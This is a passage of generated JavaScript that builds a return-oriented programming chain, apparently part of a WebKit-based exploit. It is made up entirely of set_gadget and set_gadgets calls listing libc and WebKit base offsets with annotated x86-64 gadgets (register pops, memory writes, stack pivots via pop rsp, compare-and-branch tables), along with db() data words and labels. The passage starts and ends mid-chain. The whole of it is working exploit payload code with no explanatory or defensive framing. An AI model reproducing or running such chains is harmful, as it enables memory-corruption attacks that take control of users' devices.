libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+274208, //L5188
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+274224, //L5189
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5188:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5189:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5190:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+274320, //L5191
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5191:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5193:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+274440, //L5196
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+274424, //L5194
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5194:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5196:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+274584, //L5199
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+274552, //L5197
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+274568, //L5198
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5197:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5198:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5199:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L5201:
ropchain+274688, //L5200
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+192784, //__out_rev
//L5200:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967232, 4294967295]); // -0x40
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+274816, //L5202
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+274848, //L5204
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+274832, //L5203
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5202:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5203:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5204:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+274952, //L5205
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+274968, //L5206
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L5205:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5206:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+275088, //L5207
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+275072, //L5208
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L5208:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L5207:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+275176, //L5210
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+275160, //L5209
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5209:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5210:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+275280, //L5211
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+275296, //L5212
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L5211:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5212:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+275416, //L5213
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+275400, //L5214
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L5214:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L5213:
db([0, 0]); // 0x0
//__ntoa_long:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+275488, //L5216
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L5216:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+275552, //L5218
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L5218:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([48, 0]); // 0x30
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+275640, //L5220
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5219:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L5220:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5221:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+275720, //L5222
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5222:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5224:
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L5226:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+275880, //L5229
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+275864, //L5227
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5227:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5229:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+276040, //L5233
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+275992, //L5230
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+276008, //L5231
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5230:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5231:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5232:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5233:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+276176, //L5235
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+276192, //L5236
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+276160, //L5234
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5234:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5235:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5236:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+276304, //L5238
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+276352, //L5241
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+276320, //L5239
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5238:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5239:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5240:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5241:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+276464, //L5242+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+276456, //L5242
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L5242:
db([0, 0]); // 0x0
set_gadgets([
ropchain+276480, //L5242+24
ropchain+277544, //L5237
libc_base+764760, //pop rsi
ropchain+276520, //L5243
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5243:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5245:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+276640, //L5248
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+276624, //L5246
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5246:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5248:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+276816, //L5251
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+276832, //L5252
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+276784, //L5249
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+276800, //L5250
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5249:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5250:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5251:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5252:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+276928, //L5254
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+276912, //L5253
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5253:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5254:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5255:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5256:
db([4, 0]); // 0x4
set_gadget(libc_base+763368,); //pop rcx
//L5257:
db([4, 0]); // 0x4
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+277136, //L5259
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L5258:
db([4294967295, 4294967295]); // 0xffffffffffffffff
set_gadget(libc_base+759608,); //pop rax
//L5259:
db([0, 0]); // 0x0
set_gadgets([
libc_base+847417, //xor rax, rsi ; sub rax, rsi
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+277200, //L5261
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5261:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+277256, //L5262
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5262:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+277392, //L5266
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+277376, //L5265
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5264:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L5265:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5266:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+277456, //L5267
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5267:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5269:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+277536, //L5270
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5270:
db([0, 0]); // 0x0
//L5237:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+277584, //L5272
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5272:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5274:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+277704, //L5277
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+277688, //L5275
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5275:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5277:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+277880, //L5280
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+277896, //L5281
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+277848, //L5278
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+277864, //L5279
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5278:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5279:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5280:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5281:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+277992, //L5283
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+277976, //L5282
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5282:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5283:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5284:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5285:
db([10, 0]); // 0xa
set_gadget(libc_base+763368,); //pop rcx
//L5286:
db([10, 0]); // 0xa
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+278192, //L5288
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5288:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+278248, //L5289
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5289:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+278384, //L5293
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+278368, //L5292
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5291:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L5292:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5293:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+278504, //L5296
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+278472, //L5294
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5294:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5295:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5296:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+278640, //L5298
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+278656, //L5299
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+278624, //L5297
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5297:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5298:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5299:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+278816, //L5304
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+278832, //L5305
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+278768, //L5301
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5301:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5302:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L5303:
db([1, 0]); // 0x1
set_gadget(webkit_base+3236123,); //pop r9
//L5304:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5305:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+278952, //L5306+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+278944, //L5306
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L5306:
db([0, 0]); // 0x0
set_gadgets([
ropchain+278968, //L5306+24
ropchain+279368, //L5300
libc_base+764760, //pop rsi
ropchain+279008, //L5307
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5307:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5309:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+279128, //L5312
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+279112, //L5310
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5310:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5312:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+279272, //L5315
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+279288, //L5316
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+279240, //L5313
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5313:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5314:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L5315:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5316:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+279360, //L5317
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5317:
db([0, 0]); // 0x0
//L5300:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+279488, //L5320
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+279504, //L5321
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+279472, //L5319
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5319:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5320:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5321:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+279616, //L5323
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+279664, //L5326
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+279632, //L5324
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5323:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5324:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5325:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5326:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+279776, //L5327+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+279768, //L5327
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L5327:
db([0, 0]); // 0x0
set_gadgets([
ropchain+279792, //L5327+24
ropchain+291080, //L5322
//L5328:
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5329:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5331:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+279928, //L5334
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+279912, //L5332
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5332:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5334:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+280072, //L5337
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+280040, //L5335
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+280056, //L5336
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5335:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5336:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5337:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
